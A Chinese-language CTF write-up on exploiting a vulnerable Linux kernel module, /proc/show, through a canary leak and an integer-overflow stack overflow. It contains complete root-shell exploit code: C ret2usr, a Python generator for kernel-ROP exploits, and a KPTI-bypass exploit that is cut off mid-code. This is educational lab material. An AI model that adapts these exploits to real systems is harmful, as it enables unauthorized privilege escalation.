![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n
\u5176\u6b21\u662fvmlinux\u6587\u4ef6\uff0c\u8fd9\u4e2a\u662f\u539f\u59cb\u5185\u6838\u955c\u50cf\uff0cbzImage\u662f\u538b\u7f29\u5904\u7406\u540e\u7684vmlinux\uff0c\u540e\u9762\u627egadget\u548c\u627e\u51fd\u6570\u504f\u79fb\u90fd\u662f\u4ecevmlinux\u91cc\u9762\u627e\u7684\u3002vmlinux\u548cbzImage\u7684\u5173\u7cfb\u8be6\u60c5\u53ef\u53c2\u8003\uff1a<\/p>\n\n\n\n
https:\/\/blog.csdn.net\/hanxuefan\/article\/details\/7454352<\/p>\n\n\n\n
\u5982\u679c\u6ca1\u6709vmlinux\u6587\u4ef6\u7684\u8bdd\uff0c\u9700\u8981\u501f\u52a9\u5de5\u5177\u6765\u628abzImage\u8f6c\u6210vmlinux\u4ee5\u4fbf\u63d0\u53d6gadget\uff1a<\/p>\n\n\n\n
wget https:\/\/raw.githubusercontent.com\/torvalds\/linux\/master\/scripts\/extract-vmlinux\nchmod +x extract-vmlinux\n.\/extract-vmlinux bzImage > vmlinux\nROPgadget --binary .\/vmlinux > .\/ropgadgets<\/code><\/pre>\n\n\n\n<\/span>\u6f0f\u6d1e\u5206\u6790<\/span><\/h4>\n\n\n\n\u8be5\u6a21\u5757\u901a\u8fc7\/proc\/show\u4ea4\u4e92:<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
ioctl\u4ea4\u4e92\u4e3b\u6a21\u5757\uff0c\u529f\u80fd1\u662f\u8c03\u7528show_read\uff0c\u529f\u80fd2\u662f\u4efb\u610f\u8d4b\u503c\u7ed9off\u53d8\u91cf\uff0c\u529f\u80fd3\u662f\u8c03\u7528show_copy_func\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
show_read\u51fd\u6570\u5982\u4e0b\u6240\u793a\uff0c\u6f0f\u6d1e\u70b9\u5728copy_to_user(a1, &v5[off], 64LL);\uff0c\u901a\u8fc7\u529f\u80fd2\u6539\u53d8off\u7684\u503c\u4e4b\u540e\u5c31\u53ef\u4ee5\u628a\u4efb\u610f\u5730\u5740\u5904\u7684\u503ccopy\u5230\u7528\u6237\u6001\u7684a1\uff0c\u5373ioctl\u7684\u7b2c\u4e09\u4e2a\u53d8\u91cf\uff0c\u8fd9\u4e2a\u7528\u6765\u6cc4\u9732\u5185\u6838\u7684canary\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
show_copy_func\u51fd\u6570\u5982\u4e0b\uff0c\u5b58\u5728\u6574\u6570\u6ea2\u51fa\uff0ca1\u53d6\u8d1f\u6570\u5373\u53ef\u7ed5\u8fc7\u5224\u65ad\uff0c\u540e\u7eed\u901a\u8fc7qmemcpy\u628aioctl\u7b2c\u4e09\u4e2a\u53c2\u6570\u5199\u5230\u6808\u4e0av2\uff0c\u9020\u6210\u6808\u6ea2\u51fa\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u6240\u4ee5\u601d\u8def\u5c31\u662f\u5148\u6cc4\u9732canary\uff0c\u7136\u540e\u6253ROP\uff0ckernel\u7684ROP\u94fe\u4e00\u822c\u662fcommit_creds(prepare_kernel_cred)\uff0c\u6700\u540e\u8f6c\u5230\u7528\u6237\u6001\u53bb\u6267\u884cexecve(sh)\u5373\u53ef\u3002<\/p>\n\n\n\n
\u5176\u5b9e\u5728\u6bd4\u8f83\u8fdc\u53e4\u7248\u672c\u4e2d\u7531\u4e8e\u6ca1\u6709SMEP\u548cSMAP\uff0c\u53ef\u4ee5\u4e0d\u7528\u5728\u5185\u6838\u6001\u53bb\u51d1gadget\u6253ROP\uff0c\u76f4\u63a5\u8df3\u5230\u7528\u6237\u6001\u7684\u4ee3\u7801\u53bb\u6267\u884c\uff0c\u5373ret2usr\uff0c\u8fd9\u79cd\u65b9\u6cd5\u4f1a\u66f4\u7b80\u5355\u4e00\u4e9b\u3002<\/p>\n\n\n\n
<\/span>\u8c03\u8bd5<\/span><\/h4>\n\n\n\n\u4e00\u822c\u662f\u628aexp\u5148\u7f16\u8bd1\u51fa\u6765\uff08\u9700\u8981\u9759\u6001\uff0c\u56e0\u4e3a\u4e3b\u673a\u548c\u9776\u673a\u7684\u5e93\u7248\u672c\u53ef\u80fd\u4e0d\u4e00\u6837\uff09\uff0c\u7136\u540e\u653e\u5230rootfs\u4e2d\uff0c\u6700\u540e\u901a\u8fc7\u4e0b\u8ff0\u547d\u4ee4\u6253\u5305\u518drun.sh\u542f\u52a8\uff0c\u5c31\u53ef\u4ee5\u5728qemu\u865a\u62df\u673a\u91cc\u9762\u8dd1exp\u4e86\uff1a<\/p>\n\n\n\n
find . -print0 | cpio --null -ov --format=newc > ..\/rootfs.cpio<\/code><\/pre>\n\n\n\n\u8c03\u8bd5\u9996\u5148\u9700\u8981\u4f7f\u7528root\u6743\u9650\u6765\u8dd1gdb\uff0c\u4e0d\u7136\u4f1aNX\u6743\u9650\u62a5\u9519\u3002<\/p>\n\n\n\n
sudo pwndbg .\/vmlinux<\/code><\/pre>\n\n\n\n\u7136\u540e\u8fde\u63a5\uff1a<\/p>\n\n\n\n
target remote localhost:1234<\/code><\/pre>\n\n\n\n\u5f00\u542fkaslr\u7684\u60c5\u51b5\u4e0b\uff0c\u9700\u8981\u5728qemu\u91cc\u9762\u4f7f\u7528cat \/sys\/module\/show\/sections\/.text\u627e\u57fa\u5740\uff0c\u7136\u540e\u5728gdb\u91cc\u9762\u901a\u8fc7add-symbol-file .\/show.ko 0xffffffffc0296000\uff0c\u624d\u80fd\u6210\u529f\u7ed9\u76ee\u6807\u51fd\u6570\u6253\u4e0a\u65ad\u70b9\uff0c\u53ef\u4ee5\u5728run.sh\u91cc\u9762\u628akaslr\u6539\u6210nokaslr\uff0c\u65b9\u4fbf\u8c03\u8bd5<\/p>\n\n\n\n
<\/span>\u6f0f\u6d1e\u5229\u7528<\/span><\/h4>\n\n\n\n<\/span>\u65e0\u4fdd\u62a4<\/span><\/h5>\n\n\n\n<\/span>\u65b9\u6cd5\u4e00 ret2usr<\/span><\/h6>\n\n\n\n\u7531\u4e8e\u9898\u76ee\u901a\u8fc7cat \/proc\/kallsyms > \/tmp\/kallsyms\u628a\u51fd\u6570\u5730\u5740\u90fd\u590d\u5236\u5230\u4e86\/tmp\/kallsyms\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6\u51fd\u6570\u5730\u5740\uff0c\u51cf\u53bb\u5728vmlinux\u7684\u5730\u5740\u5c31\u80fd\u5f97\u5230kaslr\u7684\u504f\u79fb\uff0c\u7ed9gadget\u52a0\u4e0a\u8fd9\u4e2a\u504f\u79fb\u5c31\u662fgadget\u7684\u771f\u5b9e\u5730\u5740\uff08\u5f53\u7136\uff0cret2usr\u4e0d\u9700\u8981gadget\uff09\u3002<\/p>\n\n\n\n
\u6240\u4ee5\u6cc4\u9732canary\uff0c\u8bfb\u53d6\u51fd\u6570\u5730\u5740\uff0c\u7136\u540e\u52ab\u6301\u5185\u6838\u6808\u8fd4\u56de\u5730\u5740\u5230\u7528\u6237\u6001\u6267\u884c\u5e03\u7f6e\u597d\u7684\u63d0\u6743\u51fd\u6570\u5373\u53ef\u3002<\/p>\n\n\n\n
\u53c2\u8003ctfwiki<\/p>\n\n\n\n
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <sys\/types.h>\n#include <sys\/ioctl.h>\n#include <sys\/stat.h>\n\n\/\/ ==========================================\n\/\/ Helper Macros\n\/\/ ==========================================\n#define SUCCESS_MSG(msg) \"\\033[32m\\033[1m\" msg \"\\033[0m\"\n#define INFO_MSG(msg) \"\\033[34m\\033[1m\" msg \"\\033[0m\"\n#define ERROR_MSG(msg) \"\\033[31m\\033[1m\" msg \"\\033[0m\"\n\n\/\/ ==========================================\n\/\/ Global Variables\n\/\/ ==========================================\nunsigned long user_cs, user_ss, user_rflags, user_sp;\nunsigned long prepare_kernel_cred_addr;\nunsigned long commit_creds_addr;\n\n\/\/ \u4fdd\u5b58\u7528\u6237\u6001\u73b0\u573a\uff0c\u4f9b iretq \u8fd4\u56de\u4f7f\u7528\nvoid save_status(void){\n __asm__ volatile (\n \"mov user_cs, cs;\"\n \"mov user_ss, ss;\"\n \"mov user_sp, rsp;\"\n \"pushf;\"\n \"pop user_rflags;\"\n );\n puts(SUCCESS_MSG(\"[*] Status has been saved.\"));\n}\n\n\/\/ \u63d0\u6743\u6210\u529f\u540e\u7684 Shell \u51fd\u6570\nvoid get_root_shell(void){\n if(getuid()) {\n puts(ERROR_MSG(\"[x] Failed to get the root!\"));\n exit(EXIT_FAILURE);\n }\n puts(SUCCESS_MSG(\"[+] Successful to get the root.\"));\n puts(INFO_MSG(\"[*] Execve root shell now...\"));\n system(\"\/bin\/sh\");\n exit(EXIT_SUCCESS);\n}\n\n\/\/ ==========================================\n\/\/ Ret2Usr Payload (Ring 0 \u6267\u884c\u7684\u4ee3\u7801)\n\/\/ ==========================================\n\/\/ \u5b9a\u4e49\u51fd\u6570\u6307\u9488\u7c7b\u578b\ntypedef void* (*prepare_kernel_cred_t)(void *);\ntypedef int (*commit_creds_t)(void *);\n\nvoid ret2usr_attack(void){\n \/\/ 1. \u5728\u5185\u6838\u6001\u76f4\u63a5\u8c03\u7528\u51fd\u6570\u63d0\u6743\n \/\/ \u7b49\u540c\u4e8e commit_creds(prepare_kernel_cred(NULL))\n prepare_kernel_cred_t pkc = (prepare_kernel_cred_t) prepare_kernel_cred_addr;\n commit_creds_t cc = (commit_creds_t) commit_creds_addr;\n \n cc(pkc(NULL));\n\n \/\/ 2. \u6062\u590d\u7528\u6237\u6001\u4e0a\u4e0b\u6587 (Swapgs + Iretq)\n \/\/ \u6ce8\u610f\uff1a\u8fd9\u91cc\u6ca1\u6709 sub rax, 8\uff0c\u56e0\u4e3a\u76f4\u63a5\u6062\u590d\u539f\u59cb sp \u901a\u5e38\u66f4\u7a33\u5b9a\n __asm__ volatile(\n \"swapgs;\"\n \"mov rax, user_ss;\"\n \"push rax;\"\n \"mov rax, user_sp;\"\n \"push rax;\"\n \"mov rax, user_rflags;\"\n \"push rax;\"\n \"mov rax, user_cs;\"\n \"push rax;\"\n \"lea rax, get_root_shell;\"\n \"push rax;\"\n \"iretq;\"\n );\n}\n\n\/\/ ==========================================\n\/\/ Main Exploitation\n\/\/ ==========================================\nint main(int argc, char ** argv){\n int fd;\n char buf[0x1000];\n unsigned long canary;\n unsigned long rop_chain[0x100]; \/\/ \u7f13\u51b2\u533a\n\n save_status();\n\n \/\/ 1. \u6253\u5f00\u8bbe\u5907 (\u4fee\u6b63\u4e3a \/proc\/show)\n fd = open(\"\/proc\/show\", O_RDWR);\n if(fd < 0) {\n \/\/ \u517c\u5bb9\u6027\u5c1d\u8bd5\n fd = open(\"\/proc\/core\", O_RDWR);\n if(fd < 0) {\n puts(ERROR_MSG(\"[x] Failed to open \/proc\/show !\"));\n exit(EXIT_FAILURE);\n }\n }\n\n \/\/ 2. \u83b7\u53d6\u5185\u6838\u51fd\u6570\u5730\u5740 (\u4ece kallsyms)\n FILE *ksyms = fopen(\"\/tmp\/kallsyms\", \"r\");\n if(!ksyms) {\n puts(ERROR_MSG(\"[-] Failed to open \/tmp\/kallsyms\"));\n return -1;\n }\n \n char sym_name[256];\n unsigned long sym_addr;\n char type; \/\/ kallsyms \u683c\u5f0f: addr type name\n \n while(fscanf(ksyms, \"%lx %c %s\", &sym_addr, &type, sym_name) != EOF) {\n if(!strcmp(sym_name, \"prepare_kernel_cred\")) {\n prepare_kernel_cred_addr = sym_addr;\n printf(INFO_MSG(\"[+] prepare_kernel_cred: %lx\\n\"), prepare_kernel_cred_addr);\n }\n else if(!strcmp(sym_name, \"commit_creds\")) {\n commit_creds_addr = sym_addr;\n printf(INFO_MSG(\"[+] commit_creds: %lx\\n\"), commit_creds_addr);\n }\n }\n fclose(ksyms);\n\n if(!prepare_kernel_cred_addr || !commit_creds_addr) {\n puts(ERROR_MSG(\"[-] Symbol not found!\"));\n return -1;\n }\n\n \/\/ 3. \u6cc4\u9732 Canary\n puts(INFO_MSG(\"[*] Reading canary...\"));\n \/\/ set offset 64\n ioctl(fd, 0x6677889C, 64);\n \/\/ read\n ioctl(fd, 0x6677889B, buf);\n canary = ((unsigned long*) buf)[0];\n printf(SUCCESS_MSG(\"[+] Got Canary: %lx\\n\"), canary);\n\n \/\/ 4. \u6784\u9020 Payload\n \/\/ \u521d\u59cb\u5316\u7f13\u51b2\u533a\uff0c\u9632\u6b62\u5783\u573e\u6570\u636e\u5e72\u6270\n memset(rop_chain, 0, sizeof(rop_chain));\n\n \/\/ [0-7] Padding (64 bytes)\n for(int i=0; i<8; i++) rop_chain[i] = canary; \/\/ \u7528canary\u586b\u5145padding\u4e5f\u884c\n\n \/\/ [8] Canary (Offset 64)\n rop_chain[8] = canary;\n\n \/\/ [9] Saved RBP (Offset 72)\n rop_chain[9] = 0xdeadbeef; \/\/ \u586b\u5145\u4e00\u4e2a\u975e\u96f6\u503c\uff0c\u9632\u6b62 pop rbp \u51fa\u9519\n\n \/\/ [10] RIP (Offset 80) -> \u8df3\u8f6c\u5230\u7528\u6237\u6001\u51fd\u6570\n rop_chain[10] = (unsigned long) ret2usr_attack;\n\n \/\/ 5. \u89e6\u53d1\u6f0f\u6d1e\n puts(INFO_MSG(\"[*] Triggering Ret2Usr...\"));\n write(fd, rop_chain, 0x800);\n \/\/ \u6574\u6570\u6ea2\u51fa\n ioctl(fd, 0x6677889A, 0xffffffffffff0100);\n\n return 0;\n}<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/span>\u65b9\u6cd5\u4e8c kernel rop<\/span><\/h6>\n\n\n\n\u8ddfret2usr\u7684\u533a\u522b\u5c31\u662f\u5f97\u5728\u5185\u6838\u91cc\u9762\u7528gadget\u51d1rop\u94fe\uff0c\u4e5f\u6bd4\u8f83\u7b80\u5355\uff0c\u76f4\u63a5\u7ed9\u51fa\u81ea\u52a8\u5316\u627egadget\u751f\u6210exp\u7684\u811a\u672c\u3002<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\nimport os\nimport sys\nimport re\nimport subprocess\n\n# ================= \u914d\u7f6e =================\nBINARY = \".\/vmlinux\"\nGADGET_FILE = \".\/ropgadgets\"\nEXP_FILE = \"exp.c\"\nSTATIC_BASE = 0xffffffff81000000 # \u5185\u6838\u9759\u6001\u57fa\u5740\n\n# ================= 1. \u81ea\u52a8\u8fd0\u884c ROPgadget =================\ndef generate_gadgets():\n if not os.path.exists(BINARY):\n # \u5982\u679c\u6ca1\u6709 vmlinux\uff0c\u68c0\u67e5\u662f\u5426\u5df2\u7ecf\u6709 ropgadgets \u6587\u4ef6\n if os.path.exists(GADGET_FILE):\n return\n print(f\"[-] \u9519\u8bef: \u627e\u4e0d\u5230\u5185\u6838\u6587\u4ef6 {BINARY} \u4e14\u6ca1\u6709\u73b0\u6210\u7684 {GADGET_FILE}\")\n sys.exit(1)\n\n if os.path.exists(GADGET_FILE):\n print(f\"[*] \u68c0\u6d4b\u5230 {GADGET_FILE} \u5df2\u5b58\u5728\uff0c\u8df3\u8fc7\u751f\u6210\u6b65\u9aa4 (\u4f7f\u7528\u73b0\u6709\u6587\u4ef6)\u3002\")\n print(\" (\u5982\u679c\u9700\u8981\u91cd\u65b0\u5206\u6790\uff0c\u8bf7\u5148\u5220\u9664\u8be5\u6587\u4ef6)\")\n return\n\n print(f\"[*] \u6b63\u5728\u6267\u884c ROPgadget \u5206\u6790 {BINARY} ...\")\n print(\" \u8fd9\u53ef\u80fd\u9700\u8981\u51e0\u5206\u949f\uff0c\u8bf7\u8010\u5fc3\u7b49\u5f85...\")\n \n try:\n with open(GADGET_FILE, \"w\") as outfile:\n subprocess.run(\n [\"ROPgadget\", \"--binary\", BINARY], \n stdout=outfile, \n check=True\n )\n print(f\"[+] \u5206\u6790\u5b8c\u6210\uff01\u7ed3\u679c\u5df2\u4fdd\u5b58\u5230 {GADGET_FILE}\")\n except FileNotFoundError:\n print(\"[-] \u9519\u8bef: \u672a\u627e\u5230 'ROPgadget' \u547d\u4ee4\u3002\u8bf7\u5148\u5b89\u88c5: pip install ropgadget\")\n sys.exit(1)\n except subprocess.CalledProcessError as e:\n print(f\"[-] ROPgadget \u6267\u884c\u5931\u8d25: {e}\")\n sys.exit(1)\n\n# ================= 2. \u641c\u7d22 Gadget =================\ndef get_offset(content, pattern, name):\n # \u79fb\u9664\u989c\u8272\u4ee3\u7801\n clean_content = re.sub(r'\\x1b\\[[0-9;]*m', '', content)\n \n matches = []\n # \u904d\u5386\u6bcf\u4e00\u884c\u5bfb\u627e\u5339\u914d\n for line in clean_content.splitlines():\n # \u683c\u5f0f\u901a\u5e38\u4e3a: 0xaddress : instruction\n m = re.search(r'(0x[0-9a-fA-F]+)\\s*:\\s*(.*)', line)\n if m:\n addr = int(m.group(1), 16)\n inst = m.group(2)\n # \u4f7f\u7528\u6b63\u5219\u5339\u914d\u6307\u4ee4\n if re.search(pattern, inst):\n matches.append((addr, inst))\n \n if not matches:\n print(f\"[-] \u672a\u627e\u5230 Gadget: {name}\")\n return None\n \n # \u7b56\u7565: \u627e\u6307\u4ee4\u957f\u5ea6\u6700\u77ed\u7684\n best_addr, best_inst = min(matches, key=lambda x: len(x[1]))\n offset = best_addr - STATIC_BASE\n print(f\"[+] \u627e\u5230 {name:<15}: {hex(best_addr)} (offset: {hex(offset)})\")\n print(f\" \u6307\u4ee4: {best_inst}\")\n return offset\n\n# ================= 3. \u4e3b\u903b\u8f91 =================\ndef main():\n # \u6b65\u9aa4 1: \u751f\u6210\u6587\u4ef6\n generate_gadgets()\n \n # \u6b65\u9aa4 2: \u8bfb\u53d6\u6587\u4ef6\n print(f\"[*] \u6b63\u5728\u89e3\u6790 {GADGET_FILE} ...\")\n try:\n with open(GADGET_FILE, \"r\", encoding=\"utf-8\", errors=\"ignore\") as f:\n content = f.read()\n except FileNotFoundError:\n print(f\"[-] \u65e0\u6cd5\u6253\u5f00 {GADGET_FILE}\")\n return\n\n # \u6b65\u9aa4 3: \u641c\u7d22\u5173\u952e Gadgets\n # \u3010\u4fee\u590d\u70b9\u3011\uff1a\u8fd9\u91cc\u52a0\u4e0a\u4e86 content \u53c2\u6570\n \n # pop rdi ; ret\n off_pop_rdi = get_offset(content, r\"^pop rdi ; ret\", \"pop rdi\")\n \n # mov rdi, rax (\u7a33\u5b9a\u7248: \u5e26 pop rbp \u7b49\u526f\u4f5c\u7528)\n off_mov = get_offset(content, r\"mov rdi, rax ; pop rbp ; mov rax, rdi ; pop r12 ; ret\", \"mov rdi, rax\")\n \n # swapgs (\u4f18\u5148\u627e swapgs ; popfq ; ret)\n off_swapgs = get_offset(content, r\"swapgs ; popfq ; ret\", \"swapgs\")\n if not off_swapgs:\n print(\"[!] \u672a\u627e\u5230 swapgs ; popfq\uff0c\u5c1d\u8bd5 swapgs ; ret\")\n off_swapgs = get_offset(content, r\"swapgs ; ret\", \"swapgs\")\n \n # iretq\n off_iretq = get_offset(content, r\"^iretq\", \"iretq\")\n\n # \u68c0\u67e5\u662f\u5426\u5168\u90e8\u627e\u5230\n if None in [off_pop_rdi, off_mov, off_swapgs, off_iretq]:\n print(\"[-] \u9519\u8bef: \u7f3a\u5c11\u5fc5\u8981\u7684 Gadget\uff0c\u65e0\u6cd5\u81ea\u52a8\u751f\u6210\u5b8c\u6574 EXP\u3002\")\n sys.exit(1)\n\n # \u6b65\u9aa4 4: \u751f\u6210 exp.c\n print(f\"[*] \u6b63\u5728\u751f\u6210 {EXP_FILE} ...\")\n \n # C \u4ee3\u7801\u6a21\u677f\n c_template = \"\"\"#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <sys\/types.h>\n#include <sys\/ioctl.h>\n#include <sys\/stat.h>\n\n\/\/ ==========================================\n\/\/ Auto-Generated Gadget Offsets\n\/\/ ==========================================\nunsigned long off_pop_rdi = %d;\nunsigned long off_mov_rdi_rax = %d; \/\/ mov rdi, rax ; pop rbp ; mov rax, rdi ; pop r12 ; ret\nunsigned long off_swapgs = %d; \/\/ swapgs ; popfq ; ret\nunsigned long off_iretq = %d;\n\n\/\/ ==========================================\n\/\/ Global Status\n\/\/ ==========================================\nunsigned long user_cs, user_ss, user_rflags, user_sp;\n\nvoid save_status() {\n __asm__(\"mov user_cs, cs;\"\n \"mov user_ss, ss;\"\n \"mov user_sp, rsp;\"\n \"pushf;\"\n \"pop user_rflags;\"\n );\n puts(\"[+] User status saved.\");\n}\n\nvoid get_shell() {\n if (getuid() == 0) {\n puts(\"[+] Rooted! Spawning shell...\");\n system(\"\/bin\/sh\");\n } else {\n printf(\"[-] Exploit failed. uid: %%d\\\\n\", getuid());\n }\n exit(0);\n}\n\nunsigned long get_addr(char *name) {\n FILE *f = fopen(\"\/tmp\/kallsyms\", \"r\");\n char buf[256];\n unsigned long addr = 0;\n if (!f) return 0;\n while (fgets(buf, 256, f)) {\n if (strstr(buf, name)) {\n sscanf(buf, \"%%lx\", &addr);\n break;\n }\n }\n fclose(f);\n return addr;\n}\n\nint main() {\n save_status();\n \n int fd = open(\"\/proc\/show\", O_RDWR);\n if (fd < 0) fd = open(\"\/proc\/core\", O_RDWR);\n if (fd < 0) {\n perror(\"[-] Open device failed\");\n exit(1);\n }\n\n \/\/ 1. \u83b7\u53d6\u5185\u6838\u5730\u5740\n unsigned long startup_64 = get_addr(\"startup_64\");\n unsigned long prepare_kernel_cred = get_addr(\"prepare_kernel_cred\");\n unsigned long commit_creds = get_addr(\"commit_creds\");\n \n unsigned long kernel_base = 0xffffffff81000000;\n if (startup_64 != 0) {\n kernel_base = startup_64;\n printf(\"[+] KASLR detected. Base: 0x%%lx\\\\n\", kernel_base);\n } else {\n printf(\"[!] No KASLR. Using static: 0x%%lx\\\\n\", kernel_base);\n }\n\n \/\/ 2. \u8ba1\u7b97\u8fd0\u884c\u65f6 Gadget \u5730\u5740\n unsigned long g_pop_rdi = kernel_base + off_pop_rdi;\n unsigned long g_mov_rdi_rax = kernel_base + off_mov_rdi_rax;\n unsigned long g_swapgs = kernel_base + off_swapgs;\n unsigned long g_iretq = kernel_base + off_iretq;\n\n printf(\"[+] prepare_kernel_cred: 0x%%lx\\\\n\", prepare_kernel_cred);\n printf(\"[+] commit_creds: 0x%%lx\\\\n\", commit_creds);\n\n \/\/ 3. \u6cc4\u9732 Canary\n ioctl(fd, 0x6677889C, 64);\n char buf[64] = {0};\n ioctl(fd, 0x6677889B, buf);\n unsigned long canary = ((unsigned long *)buf)[0];\n printf(\"[+] Leaked Canary: 0x%%lx\\\\n\", canary);\n\n \/\/ 4. \u6784\u9020 Payload\n unsigned long payload[256];\n int i = 0;\n \n \/\/ [0-63] Padding\n for(int j=0; j<8; j++) payload[i++] = canary;\n\n \/\/ [64-71] Canary\n payload[i++] = canary;\n \n \/\/ [72-79] Saved RBP (\u65e0\u9700\u586b\u5145 0, \u76f4\u63a5\u63a5 RBP)\n payload[i++] = 0xdeadbeef;\n\n \/\/ --- ROP Chain ---\n \n \/\/ Step 1: prepare_kernel_cred(0)\n payload[i++] = g_pop_rdi;\n payload[i++] = 0;\n payload[i++] = prepare_kernel_cred;\n\n \/\/ Step 2: mov rdi, rax (\u7a33\u5b9a\u7248)\n \/\/ Gadget: mov rdi, rax ; pop rbp ; mov rax, rdi ; pop r12 ; ret\n payload[i++] = g_mov_rdi_rax;\n payload[i++] = 0; \/\/ dummy rbp\n payload[i++] = 0; \/\/ dummy r12\n \n \/\/ Step 3: commit_creds(rdi)\n payload[i++] = commit_creds;\n\n \/\/ Step 4: Return to user\n \/\/ Gadget: swapgs ; popfq ; ret\n payload[i++] = g_swapgs;\n payload[i++] = 0; \/\/ dummy popfq\n \n payload[i++] = g_iretq;\n payload[i++] = (unsigned long)get_shell;\n payload[i++] = user_cs;\n payload[i++] = user_rflags;\n payload[i++] = user_sp;\n payload[i++] = user_ss;\n\n \/\/ 5. \u89e6\u53d1\n printf(\"[!] Triggering overflow...\\\\n\");\n write(fd, payload, i * 8);\n ioctl(fd, 0x6677889A, 0xffffffffffff0100);\n\n return 0;\n}\n\"\"\"\n # \u586b\u5145\u53d8\u91cf\n final_exp = c_template % (off_pop_rdi, off_mov, off_swapgs, off_iretq)\n \n with open(EXP_FILE, \"w\") as f:\n f.write(final_exp)\n\n print(f\"\\n[SUCCESS] {EXP_FILE} \u5df2\u751f\u6210\uff01\")\n print(f\"\u7f16\u8bd1\u547d\u4ee4: gcc {EXP_FILE} -o exp -static -masm=intel\")\n\nif __name__ == \"__main__\":\n main()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
<\/span>\u5f00\u542fKPTI\u4fdd\u62a4<\/span><\/h5>\n\n\n\n<\/span>\u65b9\u6cd5\u4e00 ret2usr<\/span><\/h6>\n\n\n\n\u663e\u7136\uff0c\u7531\u4e8eret2usr\u8981\u6c42\u5728\u5185\u6838\u6001\u6267\u884c\u7528\u6237\u6001\u4ee3\u7801\uff0c\u5f00\u542fKPTI\u540eret2usr\u5c31\u7528\u4e0d\u4e86\u4e86\u3002<\/p>\n\n\n\n
<\/span>\u65b9\u6cd5\u4e8c kernel rop<\/span><\/h6>\n\n\n\nrun.sh(-cpu kvm64 \u5c31\u4f1a\u9ed8\u8ba4\u542f\u52a8KPTI):<\/p>\n\n\n\n
qemu-system-x86_64 \\
-m 500M \\
-cpu kvm64 \\
-kernel .\/bzImage \\
-initrd .\/rootfs.cpio \\
-append “root=\/dev\/ram rw console=ttyS0 oops=panic panic=0 quiet kaslr” \\
-s \\
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \\
-nographic \\<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u53c2\u8003 https:\/\/ctf-wiki.org\/pwn\/linux\/kernel-mode\/exploitation\/rop\/kpti-bypass\/<\/p>\n\n\n\n
KPTI\u7b80\u5355\u5730\u8bf4\u5c31\u662f\u7528\u6237\u6001\u7684\u5185\u6838\u6001\u9875\u8868\u53ea\u7559\u4e0b\u5c11\u90e8\u5206\uff0c\u4ee5\u53ca\u5185\u6838\u6001\u7684\u7528\u6237\u6001\u9875\u8868\u76f4\u63a5\u5220\u6389\u4e86\u53ef\u6267\u884c\u4f4d\u3002<\/p>\n\n\n\n
commit_cred\u7528\u7684\u662f\u5185\u6838\u7684gadget\uff0c\u6ca1\u95ee\u9898\uff0c\u4f46\u662f\u540e\u9762\u5207\u5230ring 3\u540e\u6267\u884c\u7684\u521b\u5efash\u547d\u4ee4\u5c31\u662f\u7528\u6237\u6001\u4ee3\u7801\u4e86\uff0c\u7531\u4e8eKPTI\u7684\u5b58\u5728\u4f1a\u5bfc\u81f4\u6bb5\u9519\u8bef\u3002\u89e3\u51b3\u65b9\u6cd5\u4e5f\u7b80\u5355\uff0c\u5c31\u662f\u5728\u5207\u5230ring 3\u524d\u591a\u52a0\u4e00\u6b65\uff1a\u628a\u9875\u8868\u72b6\u6001\u4e5f\u5207\u56de\u7528\u6237\u6001\u5373\u53ef\u3002\u5185\u6838\u63d0\u4f9b\u4e86\u51fd\u6570swapgs_restore_regs_and_return_to_usermode\u6765\u5b9e\u73b0ring 0\u5207 ring 3\u540c\u65f6\u6362\u56de\u7528\u6237\u6001\u9875\u8868\u7684\u529f\u80fd\uff0c\u4e0d\u8fc7\u6211\u4eec\u7528\u7684\u65f6\u5019\u9700\u8981\u8df3\u8fc7\u524d\u9762\u4e00\u5927\u6bb5pop\uff0c\u5f97\u628avmlinux\u62d6ida\u91cc\u9762\u624b\u52a8\u627e\u8d77\u59cb\u4f4d\u7f6emov rdi, rsp\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u7136\u540e\u5728\u5e03\u7f6eROP\u7684\u65f6\u5019\u540e\u9762\u8fd8\u8981\u586b\u5145\u4e24\u4e2a\u5355\u4f4d\u624d\u80fd\u8df3\u5230\u7528\u6237\u6001\u7684getshell\uff0c\u539f\u56e0\u6ca1\u641e\u61c2\u3002<\/p>\n\n\n\n
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <sys\/types.h>\n#include <sys\/ioctl.h>\n\n\/**\n * Kernel Pwn Infrastructures\n *\/\n#define SUCCESS_MSG(msg) \"\\033[32m\\033[1m\" msg \"\\033[0m\"\n#define INFO_MSG(msg) \"\\033[34m\\033[1m\" msg \"\\033[0m\"\n#define ERROR_MSG(msg) \"\\033[31m\\033[1m\" msg \"\\033[0m\"\n#define log_success(msg) puts(SUCCESS_MSG(msg))\n#define log_info(msg) puts(INFO_MSG(msg))\n#define log_error(msg) puts(ERROR_MSG(msg))\n\n\/\/ \u5168\u5c40\u53d8\u91cf\nsize_t commit_creds = 0, prepare_kernel_cred = 0;\nsize_t startup_64 = 0, swapgs_restore_regs = 0;\nsize_t kernel_base = 0xffffffff81000000; \/\/ \u9ed8\u8ba4\u57fa\u5740\nsize_t user_cs, user_ss, user_rflags, user_sp;\n\n\/\/ \u4fdd\u5b58\u7528\u6237\u6001\u72b6\u6001\nvoid save_status(void){\n asm volatile (\n \"mov user_cs, cs;\"\n \"mov user_ss, ss;\"\n \"mov user_sp, 